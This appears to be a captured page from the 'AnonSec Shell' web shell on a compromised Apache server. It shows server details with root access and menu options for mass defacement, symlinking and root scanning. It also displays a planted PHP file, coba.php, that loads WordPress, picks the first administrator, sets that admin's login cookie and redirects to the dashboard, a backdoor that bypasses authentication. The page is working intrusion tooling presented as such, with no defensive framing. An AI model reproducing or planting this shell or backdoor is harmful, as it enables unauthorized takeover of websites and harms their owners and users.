AnonSec Shell
Server IP : 160.153.0.21  /  Your IP : 18.225.57.173   [ Reverse IP ]
Web Server : Apache
System : Linux 957fb541-670d-3293-9ec0-a66a84749aec.secureserver.net 6.1.128-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Sat Feb 1 15:04:00 EST 2025 x86_64
User : root ( 0)
PHP Version : 8.0.30.4
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/coba.php
<?php
$mr=$_SERVER['DOCUMENT_ROOT'];
@chdir($mr);
if (file_exists('wp-load.php')){
	include 'wp-load.php';
	$wp_user_query = new WP_User_Query( array( 'role' => 'Administrator', 'number' => 1, 'fields' => 'ID' ) );
	$results= $wp_user_query->get_results();

	if ( isset( $results[0] ) ) {
		wp_set_auth_cookie( $results[0] );
		wp_redirect( admin_url() );
		die();
	}
	die( 'NO ADMIN' );

}
else{
	die('Failed to load');
}

?>

Anon7 - 2022
AnonSec Team